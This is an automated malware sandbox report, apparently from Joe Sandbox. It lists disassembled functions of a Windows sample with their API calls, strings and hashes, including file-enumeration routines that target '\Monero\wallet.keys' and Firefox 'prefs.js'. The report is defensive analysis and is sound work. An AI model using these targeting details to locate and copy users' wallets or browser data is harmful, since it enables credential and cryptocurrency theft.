                              • Opcode ID: b7e0e10d28ff48aa23428da5fc7e3d3556d4ad97c675f4cd6ba6b547ad22ef1d
                              • Instruction ID: 010c0cd5a39fb9402424735e8ad8e532a8f4e74c8aed08c4f0e219b2d0ec66ca
                              • Opcode Fuzzy Hash: b7e0e10d28ff48aa23428da5fc7e3d3556d4ad97c675f4cd6ba6b547ad22ef1d
                              • Instruction Fuzzy Hash: 25517BB19542189BCB60EBB0DC89FEE737CAB94300F404689F60992050EB799BD4DF92
                              Function 007A3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 007A3EC3
                              • FindFirstFileA.KERNEL32(?,?), ref: 007A3EDA
                              • StrCmpCA.SHLWAPI(?,007B0FAC), ref: 007A3F08
                              • StrCmpCA.SHLWAPI(?,007B0FB0), ref: 007A3F1E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 007A406C
                              • FindClose.KERNEL32(000000FF), ref: 007A4081
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: af15d6fa5f3345f2fb41fb3247b8504ffd76b64b596833760bb483d647fdf604
                              • Instruction ID: a869142fb72d4f444a10dfe0f48b8b0894c5e9102f66fa1eb805330fb10a1dc5
                              • Opcode Fuzzy Hash: af15d6fa5f3345f2fb41fb3247b8504ffd76b64b596833760bb483d647fdf604
                              • Instruction Fuzzy Hash: 81519CB2914218EBCB24EBB0DC49EFA737CBB84300F404689F61992040DB79EB95DF91
                              Function 0079ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0079ED3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0079ED55
                              • StrCmpCA.SHLWAPI(?,007B1538), ref: 0079EDAB
                              • StrCmpCA.SHLWAPI(?,007B153C), ref: 0079EDC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0079F2AE
                              • FindClose.KERNEL32(000000FF), ref: 0079F2C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 180737720-1013718255
                              • Opcode ID: 16594118a724e20b34d5e1fdc18e428864c235a309f8481e9b3f3b0ac9b30e36
                              • Instruction ID: e9a91142b78fdbdf961f6d73b421aebd325d8e7feb69d9c64d141dacd9836b38
                              • Opcode Fuzzy Hash: 16594118a724e20b34d5e1fdc18e428864c235a309f8481e9b3f3b0ac9b30e36
                              • Instruction Fuzzy Hash: 2DE1C571911118EADB95FB60DC56EEE7378AF95300F4042A9B50B62092EF386F8ACF51
                              Function 0079F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007B15B8,007B0D96), ref: 0079F71E
                              • StrCmpCA.SHLWAPI(?,007B15BC), ref: 0079F76F
                              • StrCmpCA.SHLWAPI(?,007B15C0), ref: 0079F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0079FAB1
                              • FindClose.KERNEL32(000000FF), ref: 0079FAC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: 4c7e8e8c9cc43461534f60484c5010c2300e6b4544141979f2fcd73867684d8f
                              • Instruction ID: e4a559d326260328cba94768c78df59ef9cef211572e060afd3858c5be9d63b1
                              • Opcode Fuzzy Hash: 4c7e8e8c9cc43461534f60484c5010c2300e6b4544141979f2fcd73867684d8f
                              • Instruction Fuzzy Hash: 89B13571910104EFDB64FF60DC5AFEE7379AF95300F4086A9E40A96151EF386B49CB92
                              Function 007916D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007B510C,?,?,?,007B51B4,?,?,00000000,?,00000000), ref: 00791923
                              • StrCmpCA.SHLWAPI(?,007B525C), ref: 00791973
                              • StrCmpCA.SHLWAPI(?,007B5304), ref: 00791989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00791D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00791DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00791E20
                              • FindClose.KERNEL32(000000FF), ref: 00791E32
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 8b9fd98e905011341894e37b39347cbb885bf72b34cae3cf9344cc7ed36a9084
                              • Instruction ID: 7c10792631911093e498839e8a8ccbfbcf9b876b2aaf841c12328a9c1825dddb
                              • Opcode Fuzzy Hash: 8b9fd98e905011341894e37b39347cbb885bf72b34cae3cf9344cc7ed36a9084
                              • Instruction Fuzzy Hash: 4C12D071910118EBDB55FB60DC9AAEE7378AF95300F4042A9B50B66091EF3C6F89CF91
                              Function 0079DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,007B0C2E), ref: 0079DE5E
                              • StrCmpCA.SHLWAPI(?,007B14C8), ref: 0079DEAE
                              • StrCmpCA.SHLWAPI(?,007B14CC), ref: 0079DEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0079E3E0
                              • FindClose.KERNEL32(000000FF), ref: 0079E3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: d61469850affb31ce20c5d2f79aceeb7bae2b0b0f9e64cea7f5e6e5d040f94f2
                              • Instruction ID: e3b73ad169d914dad1fb19d89d09f6c22bb7ba1730ba15fbcbf00e03951ab981
                              • Opcode Fuzzy Hash: d61469850affb31ce20c5d2f79aceeb7bae2b0b0f9e64cea7f5e6e5d040f94f2
                              • Instruction Fuzzy Hash: E4F19071914118EADB56EB60DC99EEE7378BF55300F8142E9B40B62091EF386F8ACF51
                              Function 00B55515 Relevance: 14.2, Strings: 10, Instructions: 1656COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: CTdo$NC$VI~f$tAw2$uz/$vS^$yT{^$E^g$X=u$nXu
                              • API String ID: 0-1128772954
                              • Opcode ID: 283bf2afbc9dc1c16cd63e5c4fa93799a80d96201af1921f70100a5eada319f8
                              • Instruction ID: 1d93f0b6e3c409f2d07f8c6c0fa6c902cb1896decccd7d147bf2bf90a81e43e2
                              • Opcode Fuzzy Hash: 283bf2afbc9dc1c16cd63e5c4fa93799a80d96201af1921f70100a5eada319f8
                              • Instruction Fuzzy Hash: 20B208F36082049FE3046E2DEC8567AFBEAEFD4720F16893DE6C4C7744EA3558058696
                              Function 0079DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007B14B0,007B0C2A), ref: 0079DAEB
                              • StrCmpCA.SHLWAPI(?,007B14B4), ref: 0079DB33
                              • StrCmpCA.SHLWAPI(?,007B14B8), ref: 0079DB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0079DDCC
                              • FindClose.KERNEL32(000000FF), ref: 0079DDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 6ae62084fd43977a1525dcf13c2df5a115d5f83717427289d985749821e965e3
                              • Instruction ID: cae83529da50781e85275c6710a8679939fd6fe848a8cbd7738e3630603acc66
                              • Opcode Fuzzy Hash: 6ae62084fd43977a1525dcf13c2df5a115d5f83717427289d985749821e965e3
                              • Instruction Fuzzy Hash: A7912272910104EBCF54FBB0EC5A9EE737DABC5300F408669B90A96141EF3C9B59CB92
                              Function 00B5DC27 Relevance: 12.9, Strings: 9, Instructions: 1671COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: WH_?$o;$oS{$r`Os$tFK'$yqmW$z9~$|-?~$v[
                              • API String ID: 0-3677875943
                              • Opcode ID: 768ee0121bd67e9e9fb6bd3793a3d1b8372ff3f5fb488ebdb1c62d288c9e67a6
                              • Instruction ID: b8ac088121bffd337c2491fb5233365a8dc5c45d8ced326d71baf1ddc0860555
                              • Opcode Fuzzy Hash: 768ee0121bd67e9e9fb6bd3793a3d1b8372ff3f5fb488ebdb1c62d288c9e67a6
                              • Instruction Fuzzy Hash: ADB227F3A0C2049FD3046F2DEC8567AFBE9EF94720F1A893DEAC487744E67558058692
                              Function 007A7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,007B05AF), ref: 007A7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 007A7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 007A7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 007A7C62
                              • LocalFree.KERNEL32(00000000), ref: 007A7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, Offset: 00790000, based on PE: true
                              • Associated: 00000000.00000002.1784001009.0000000000790000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.000000000084D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784022892.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.00000000009EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C78000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C7F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784193305.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1784833647.0000000000C90000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788696003.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1788750681.0000000000E30000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_790000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 0affcf3523fd00684a251073818906307a804e8f701a8f5cad938d0e2bdade82
                              • Instruction ID: 63da20da87416b3bab18ee2e8fbadeaf8df90c790bab966d7a40cd109b91e981
                              • Opcode Fuzzy Hash: 0affcf3523fd00684a251073818906307a804e8f701a8f5cad938d0e2bdade82
                              • Instruction Fuzzy Hash: 0E415E71951218EBCB64DB54DC9DBEEB3B8FF85700F204299E40A62191DB782F85CFA1
                              Function 0079E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007AA740: lstrcpy.KERNEL32(007B0E17,00000000), ref: 007AA788
                                • Part of subcall function 007AA920: lstrcpy.KERNEL32(00000000,?), ref: 007AA972
                                • Part of subcall function 007AA920: lstrcat.KERNEL32(00000000), ref: 007AA982
                                • Part of subcall function 007AA9B0: lstrlen.KERNEL32(?,014C9130,?,\Monero\wallet.keys,007B0E17), ref: 007AA9C5
                                • Part of subcall function 007AA9B0: lstrcpy.KERNEL32(00000000), ref: 007AAA04
                                • Part of subcall function 007AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 007AAA12
                                • Part of subcall function 007AA8A0: lstrcpy.KERNEL32(?,007B0E17), ref: 007AA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,007B0D73), ref: 0079E4A2
                              • StrCmpCA.SHLWAPI(?,007B14F8), ref: 0079E4F2
                              • StrCmpCA.SHLWAPI(?,007B14FC), ref: 0079E508
